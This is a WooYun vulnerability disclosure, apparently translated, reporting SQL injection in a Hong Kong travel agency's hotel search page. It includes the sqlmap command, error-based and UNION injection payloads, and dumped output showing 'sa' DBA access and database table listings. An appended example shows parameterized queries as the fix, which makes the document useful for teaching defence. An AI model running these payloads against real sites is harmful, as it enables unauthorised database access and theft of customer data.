Vulnerability summary

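Vulnerability ID: wooyun-2015-0153157

Title: SQL injection in a page of 天洋旅遊 (DBA privileges / sa password disclosure / IP information of 370,000 users exposed) (Hong Kong)

Vendor: 天洋旅遊

Author: 路人甲

Submitted: 2015-11-10 09:55

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed to a third-party partner organization (hkcert, Hong Kong's computer emergency response coordination centre) for handling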

Source: http://www.wooyun.org



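Vulnerability details

Disclosure status:

2015-11-10: Details reported to the vendor; awaiting vendor action
2015-11-20: Vendor confirmed; details disclosed to the vendor only
2015-11-30: Details disclosed to core white hats and experts in related fields
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public

Brief description: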

Any Tours's main focus of Business Activities are Corporate Business Travel Arrangements, Full Travel Management and support for M.I.C.E & EVENTS, Interest/Leisure Groups, Incentive travel for Hong Kong, China & Macau inbound/outbound, especially Special Interest Group, like Sports (Rugby, Soccer, Golf, Formula One Grand Prix) & Student Study exchange groups.
Any Tours has also invested in the training & development of experienced, energetic and service minded work force. Our team members create, design and build the most exclusive itineraries catering to our clients' needs and they are the cornerstone of creating the magic, by providing quality, creativity, innovation and integrity with their great talent, passion and dedication. The company network expands over many countries and has an active working relation with like minded clients and travel industry partners from all over the world.
Any Tours provides Real time Easy to Access On-line worldwide air ticketing and hotel bookings with full travel information and e-commerce capabilities. Having a presence on the worldwide web since 1997, Any Tours has secured a great place in the e-commerce business of the 21st Century and is aiming to provide high and easy accessibility to worldwide & automated travel services for clients and travel partners' conveniences 24 x 7, around the clock.
Our key words when dealing with our partners & clients are taking personal responsibility for providing the High Quality Services & Products with Efficiency, Reliability and Satisfaction with Trust.

Detailed description:

URL: http://**.**.**.**/tch/Hotel/search/?action=city&code=TYO

python sqlmap.py -u "http://**.**.**.**/tch/Hotel/search/?action=city&code=TYO" -p code --technique=EU --random-agent --batch  --current-user --is-dba --users --passwords --count


Database: Anytours
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.IpList | 369232 |

Proof of vulnerability:

---
Parameter: code (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: action=city&code=TYO' AND 8122=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8122=8122) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(122)+CHAR(113))) AND 'sYzx'='sYzx
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: action=city&code=-4812' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113)+CHAR(90)+CHAR(116)+CHAR(115)+CHAR(103)+CHAR(103)+CHAR(88)+CHAR(110)+CHAR(83)+CHAR(117)+CHAR(102)+CHAR(119)+CHAR(106)+CHAR(87)+CHAR(106)+CHAR(66)+CHAR(114)+CHAR(83)+CHAR(100)+CHAR(100)+CHAR(97)+CHAR(78)+CHAR(107)+CHAR(67)+CHAR(98)+CHAR(117)+CHAR(71)+CHAR(109)+CHAR(65)+CHAR(117)+CHAR(89)+CHAR(65)+CHAR(89)+CHAR(90)+CHAR(119)+CHAR(118)+CHAR(105)+CHAR(119)+CHAR(74)+CHAR(113)+CHAR(101)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(122)+CHAR(113)-- -
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
current user is DBA: True
database management system users [3]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] sa
database management system users password hashes:
Database: ReportServerTempDB
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.DBUpgradeHistory | 27 |
+------------------------------------------------------+---------+
Database: TravelConnect_Log
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.ReserveLog | 2438 |
| dbo.AirPricing | 1325 |
| dbo.UrPnrLog | 1121 |
| dbo.ErrLog | 45 |
+------------------------------------------------------+---------+
Database: Anytours
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.IpList | 369232 |
| dbo.Shopcart_CartListD | 334967 |
| dbo.Hotel_Item_Links_CHT | 120780 |
| dbo.Hotel_Item_Links_CHT | 120780 |
| dbo.tBookingOrderD2 | 116622 |
| dbo.Hotel_Item_RmCategory_CHT | 98821 |
| dbo.Hotel_Item_RmCategory_CHT | 98821 |
| dbo.Request_Value | 79377 |
| dbo.Hotel_Item_Facilities_CHT | 72004 |
| dbo.Hotel_Item_Facilities_CHT | 72004 |
| dbo.Hotel_Item_RmFacilities_CHT | 53429 |
| dbo.Hotel_Item_RmFacilities_CHT | 53429 |
| dbo.Hotel_Item_Report_CHT | 48752 |
| dbo.Hotel_Item_Report_CHT | 48752 |
| dbo.sGalileoLog | 45412 |
| dbo.Hotel_Item_RoomType_CHT | 40925 |
| dbo.Hotel_Item_RoomType_CHT | 40925 |
| dbo.Request_Passenger | 20280 |
| dbo.Request_Passenger | 20280 |
| dbo.an2idcity | 16913 |
| dbo.GTA_XMLRequestErrorLog | 15834 |
| dbo.Hotel_Item_Location_CHT | 11361 |
| dbo.Hotel_Item_Location_CHT | 11361 |
| dbo.Shopcart_CartListH | 9458 |
| dbo.Fare_mCityPort | 9286 |
| dbo.Hotel_Item_CHT | 8624 |
| dbo.Hotel_Item_CHT | 8624 |
| dbo.Airfare_City | 6563 |
| dbo.tBookingOrderD_AirfarePax | 6048 |
| dbo.tBookingOrderD_AirfarePax | 6048 |
| dbo.tBookingOrderD_AirfarePax | 6048 |
| dbo.Airfare_Airport | 5437 |
| dbo.tPaymentRecoed | 4003 |
| dbo.mUser | 3903 |
| dbo.tBookingOrderH | 3362 |
| dbo.sRecLog | 3306 |
| dbo.tBookingOrderEmailRecord | 2152 |
| dbo.mAirfare | 1363 |
| dbo.Fare_FareSheet_Segment_Flight | 869 |
| dbo.Fare_FareSheet_Segment_Flight | 869 |
| dbo.Hotel_Area | 809 |
| dbo.Airfare_Airline | 795 |
| dbo.tBooking_ErrorRecord | 488 |
| dbo.tBookingOrderD_RoomPax | 392 |
| dbo.an2idairline | 324 |
| dbo.iSecurityLevel | 281 |
| dbo.iPackageGroup | 261 |
| dbo.Airfare_Country | 251 |
| dbo.CountryISO | 249 |
| dbo.an2idcountry | 248 |
| dbo.GTA_ASynchronousResponse | 240 |
| dbo.Package_City | 237 |
| dbo.IpBlockCountry | 236 |
| dbo.User_TelCountryCode | 233 |
| dbo.Fare_mCountry | 227 |
| dbo.AirfareMarkUpPriceList | 181 |
| dbo.Hotel_Country | 173 |
| dbo.Insurance_Destination | 173 |
| dbo.tBookingOrderD_RoomDesc | 112 |
| dbo.tBookingOrderD_RoomDesc | 112 |
| dbo.Package_Carrier | 62 |
| dbo.LinkMap | 56 |
| dbo.mForm | 40 |
| dbo.News | 36 |
| dbo.Advertisement | 31 |
| dbo.Insurance_CodeList | 30 |
| dbo.Airfare_ExcludeAirline | 29 |
| dbo.an2idfareclass | 29 |
| dbo.Airfare_Class | 26 |
| dbo.Package_Country | 22 |
| dbo.Cruise_CruiseLine | 19 |
| dbo.Cruise_CruiseLine | 19 |
| dbo.Insurance_PlanFee | 19 |
| dbo.Package_Activity | 15 |
| dbo.Package_Activity | 15 |
| dbo.HotelMarkUpPriceList | 13 |
| dbo.Cruise_Country | 12 |
| dbo.ApiRecord | 11 |
| dbo.AdvertisementType | 10 |
| dbo.Hotel_DectinationRanking | 10 |
| dbo.Package_DectinationRanking | 10 |
| dbo.mOperator_Login | 8 |
| dbo.mOperator_Login | 8 |
| dbo.Hotel_RoomType | 6 |
| dbo.Cruise_CruiseLineRanking | 5 |
| dbo.Cruise_DurationRanking | 5 |
| dbo.Fare_FareSheet_CarrierRanking | 4 |
| dbo.Hotel_Currency | 4 |
| dbo.Shopcart_ItemType | 4 |
| dbo.Cruise_City | 3 |
| dbo.Cruise_City | 3 |
| dbo.fSysNumberControl | 3 |
| dbo.fSysNumberControl | 3 |
| dbo.ApiAuth | 2 |
| dbo.Cruise_Type | 2 |
| dbo.Hotel_CityGroup | 2 |
| dbo.Hotel_CityGroup | 2 |
| dbo.Insurance_TravelInsuranceD | 2 |
| dbo.mContent | 2 |
| dbo.ShopCart_TempDS | 2 |
| dbo.Insurance_TravelInsuranceErrorLog | 1 |
| dbo.Insurance_TravelInsuranceH | 1 |
+------------------------------------------------------+---------+
Database: ReportServer
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.DBUpgradeHistory | 31 |
| dbo.ConfigurationInfo | 23 |
| dbo.Roles | 8 |
| dbo.PolicyUserRole | 4 |
| dbo.Users | 3 |
| dbo.Keys | 2 |
| dbo.Policies | 2 |
| dbo.SecData | 2 |
| dbo.ServerUpgradeHistory | 2 |
| dbo.Catalog | 1 |
| dbo.UpgradeInfo | 1 |
+------------------------------------------------------+---------+

Fix:

Deploy a WAF.

Copyright notice: when reposting, credit the source: 路人甲@乌云
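
An added example, not part of the original report or the vendor's code: the `code` parameter handled three ways (concatenated into the SQL text, bound as a parameter, and validated against an allow-list before binding), run against a probe shaped like the report's UNION payload. SQLite stands in for SQL Server, and the table, column and function names and the three-letter city-code format are assumptions.

```python
import re
import sqlite3

# Constructed probe modelled on the report's UNION payload; the CHAR() chain
# is replaced by the literal marker it spells ("qjvbq").
UNION_PROBE = "-4812' UNION ALL SELECT 'qjvbq'-- -"

# Assumed format of the `code` parameter: three-letter city code such as TYO.
CITY_CODE = re.compile(r"[A-Z]{3}")

def make_db():
    """In-memory stand-in database; table and column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE hotels (city_code TEXT, name TEXT)")
    db.executemany(
        "INSERT INTO hotels VALUES (?, ?)",
        [("TYO", "Hotel A"), ("TYO", "Hotel B"), ("OSA", "Hotel C")],
    )
    return db

def search_concatenated(db, code):
    """'Before' form: a quote in `code` changes the structure of the query."""
    sql = "SELECT name FROM hotels WHERE city_code = '" + code + "'"
    return sorted(row[0] for row in db.execute(sql))

def search_bound(db, code):
    """Bound parameter: the value is compared as data, never parsed as SQL."""
    sql = "SELECT name FROM hotels WHERE city_code = ?"
    return sorted(row[0] for row in db.execute(sql, (code,)))

def search_hardened(db, code):
    """Allow-list validation first, then the bound query."""
    if not CITY_CODE.fullmatch(code):
        raise ValueError("invalid city code")
    return search_bound(db, code)

def demo():
    """Run the probe through all three handlers and collect the outcomes."""
    db = make_db()
    results = {
        "concatenated": search_concatenated(db, UNION_PROBE),
        "bound": search_bound(db, UNION_PROBE),
    }
    try:
        search_hardened(db, UNION_PROBE)
        results["hardened"] = "accepted"
    except ValueError:
        results["hardened"] = "rejected"
    return results

if __name__ == "__main__":
    print(demo())
```

On the ASP.NET and SQL Server stack named in the sqlmap output, the same pattern is a parameterized `SqlCommand`. The output also shows the application connecting as `sa`; a login restricted to the application's own database limits what any remaining injection can reach.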


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2015-11-20 15:17

Vendor reply:

Referred to related parties.

Latest status:

None